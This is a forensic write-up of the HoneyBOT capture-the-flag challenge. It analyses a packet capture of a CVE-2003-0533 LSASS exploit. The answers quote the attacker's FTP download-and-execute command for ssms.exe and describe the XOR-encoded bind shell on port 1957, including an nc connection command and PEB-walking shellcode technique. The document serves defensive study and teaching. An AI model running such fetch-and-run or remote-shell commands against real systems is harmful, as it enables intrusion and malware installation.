HoneyBOT
📅 Published: 2026-04-18 20:54 | 🔄 Last Updated: 2026-05-12 15:03
https://cyberdefenders.org/blueteam-ctf-challenges/honeybot/
Q1 What is the attacker's IP address?

Using NetworkMiner, the two hosts in the capture are:
192.150.11.111 [VIDCAM] (Linux)
98.114.205.102 [HOD] (Windows)
220 NzmxFtpd 0wns j0
Q2 What is the target's IP address?
192.150.11.111 [VIDCAM] (Linux)
Q3 Provide the country code for the attacker's IP address (a.k.a geo-location).
US

Q4 How many TCP sessions are present in the captured traffic?

5
Q5 How long did it take to perform the attack (in seconds)?
Statistics > Capture File Properties in Wireshark
Q6 Provide the CVE number of the exploited vulnerability.
filter: smb
Active Directory Setup, DsRoleUpgradeDownlevelServer

CVE-2003-0533 is a highly critical, remotely exploitable vulnerability in Microsoft Windows, infamous as the primary flaw exploited by the Sasser worm.
Exploitation mechanism: an attacker sends a specially crafted, malformed packet to the LSASS DCE/RPC endpoint (reachable over TCP ports 139 and 445). The packet tricks the undocumented DsRolerUpgradeDownlevelServer function into trying to create an excessively long debug log file, which overflows a buffer and allows arbitrary code execution.
CVE-2003-0533
Q7 Which protocol was used to carry over the exploit?
SMB
Q8 Which protocol did the attacker use to download additional malicious files to the target system?
I checked the TCP stream.
FTP
Q9 What is the name of the downloaded malware?
echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe ssms.exe
Q10 The attacker's server was listening on a specific port. Provide the port number.
8884
Q11 When was the involved malware first submitted to VirusTotal for analysis? Format: YYYY-MM-DD

The file starts with the MZ signature, so it is obviously an executable.
I download it and calculate the hash

2007-06-27
Q12 What is the key used to encode the shellcode?
The attacker has to use an encoding key here, XOR, to avoid detection by EDR or AV.
scdbg -f shellcode.bin -s -1 -v
Process Environment Block (PEB). The PEB is a structure in Windows that contains information about the currently running process, including loaded modules, memory layout, and execution state. By traversing this structure, the shellcode can locate the base address of essential system libraries, such as kernel32.dll, which contains critical functions needed for execution.
The CVE-2003-0533 exploit triggers the buffer overflow in lsass.exe and places a NOP sled (a sequence of 0x90 bytes) in front of the shellcode.

I used CyberChef to remove the whole NOP sled manually, saved the shellcode and ran scdbg:
scdbg -f shellcode.bin /findsc

- /findsc: scans the entire file to locate potential starting points (offsets) for executable code. It identified the offset 0x70f, which leads directly into a NOP (No-Operation) sled.
- GetProcAddress & LoadLibraryA: shellcode cannot call functions directly like normal software does. It has to dynamically "ask" Windows to resolve the RAM addresses of essential functions like CreateProcessA or bind.
- LoadLibraryA(ws2_32): loads the Windows networking library (ws2_32.dll) to prepare for network communications.
- WSASocket: creates a network socket.
- bind(port: 1957): this is the smoking gun for Q13. The malware is instructing Windows to "reserve port 1957 exclusively for me."
- listen: switches the socket into a listening state, ready and waiting for an incoming connection from the outside (the attacker).
- accept: pauses execution and waits. When the hacker attempts to connect to port 1957, this function is triggered to accept the connection and let the attacker into the system.
- CreateProcessA("cmd", ...): immediately after a successful accept, it spawns cmd.exe. The key takeaway: within the shellcode's instructions, the standard input/output streams (stdin/stdout) of this cmd.exe process are redirected straight into the newly created network socket.
- The result: the attacker simply needs to run the command nc <victim_IP> 1957 from their machine, and they will instantly be presented with an interactive command prompt (CMD) for the victim's machine.
- closesocket & ExitThread: once the attacker disconnects, the shellcode closes the network connections and terminates the thread gracefully. This is done to avoid causing a system crash or leaving error logs that would attract the attention of network defenders.
Then I ran scdbg -f shellcode.bin /findsc /v, which makes scdbg print every single CPU instruction it executes step by step, rather than just summarizing the final API calls.
This is a classic shellcode technique called "JMP-CALL-POP" combined with an XOR decoding loop.

0x99
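Recovering the key can also be scripted before the buffer goes to scdbg. The following is an added example, not code from this write-up: it strips the 0x90 sled the way it was removed in CyberChef above, then tries all 256 single-byte XOR keys and scores each one by the clear-text markers a bind shell must expose (ws2_32, cmd, kernel32, matching the scdbg calls listed earlier). The SAMPLE buffer is constructed here by XOR-ing a synthetic body with 0x99 and is not the capture's shellcode.

```python
import re

# Clear-text markers a Windows bind shell exposes once decoded; they match the
# LoadLibraryA(ws2_32) and CreateProcessA(cmd) calls scdbg reported above.
EXPECTED = [b"ws2_32", b"cmd", b"kernel32"]

# Constructed sample (not the capture's shellcode): a 16-byte NOP sled, three
# unencoded decoder-stub bytes, then a body XOR-ed with the key 0x99.
_BODY = b"\x33\xc9\x64\x8b\x41\x30\x8b\x40\x0cws2_32\x00cmd\x00kernel32.dll\x00"
SAMPLE = b"\x90" * 16 + b"\xeb\x0b\x5e" + bytes(b ^ 0x99 for b in _BODY)


def strip_nop_sled(buf: bytes, nop: int = 0x90, min_run: int = 8) -> bytes:
    """Drop a leading run of 0x90 (NOP) bytes; short runs are left alone."""
    i = 0
    while i < len(buf) and buf[i] == nop:
        i += 1
    return buf[i:] if i >= min_run else buf


def xor_single(buf: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in buf)


def printable_strings(buf: bytes, min_len: int = 3) -> list[str]:
    """Like the `strings` tool: runs of printable ASCII at least min_len long."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, buf)]


def recover_key(encoded: bytes) -> tuple[int, int]:
    """Try all 256 single-byte keys; return (key, marker hits) for the best one."""
    def hits(k: int) -> int:
        return sum(xor_single(encoded, k).count(s) for s in EXPECTED)
    best = max(range(256), key=hits)
    return best, hits(best)


def analyse(buf: bytes) -> dict:
    """Strip the sled, recover the key, list the strings the decoded body exposes."""
    body = strip_nop_sled(buf)
    key, hits = recover_key(body)
    return {"sled_len": len(buf) - len(body), "key": key, "hits": hits,
            "strings": printable_strings(xor_single(body, key))}


if __name__ == "__main__":
    print(analyse(SAMPLE))  # key 0x99 with 3 marker hits
```

A real decoder stub is left unencoded in front of the body, so the recovered key only applies to the bytes after it; the marker scoring still finds it because the stub contributes no matches.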
Q13 What is the port number the shellcode binds to?
The answer was already shown in the previous question.
1957
Q14 The shellcode used a specific technique to determine its location in memory. What is the OS file being queried during this process?
kernel32.dll
When regular software (Chrome, Word) starts, the Windows operating system carefully loads it into memory and hands it a "map" of where all the important system files are located.
Shellcode, however, is injected forcefully and illegally into memory. It is Position-Independent Code (PIC), meaning it is dropped in completely blind: it doesn't know where it is, and it doesn't have a map of where the Windows functions are.
To do anything malicious, the shellcode must find the master list of Windows functions. In Windows, the holy grail for this is kernel32.dll, because it contains a function called GetProcAddress. Once the shellcode has GetProcAddress, it can ask Windows for the address of any other function it needs.
- In 32-bit Windows, a special CPU segment register called fs points to a data structure holding information about the current thread.
- Exactly at offset 0x30 inside that structure is a pointer to the Process Environment Block (PEB).
- The PEB is essentially the internal "map" that Windows gave to the victim process.
- The subsequent instructions (mov eax, [eax+0xc], mov esi, [eax+0x14], etc.) show the shellcode opening that map, flipping to the "Loaded Modules" section (the LDR data structure), and reading the list of loaded DLLs. mov esi, [eax+0x1c] moves to InInitializationOrderModuleList; the shellcode loops through this list until it finds kernel32.dll.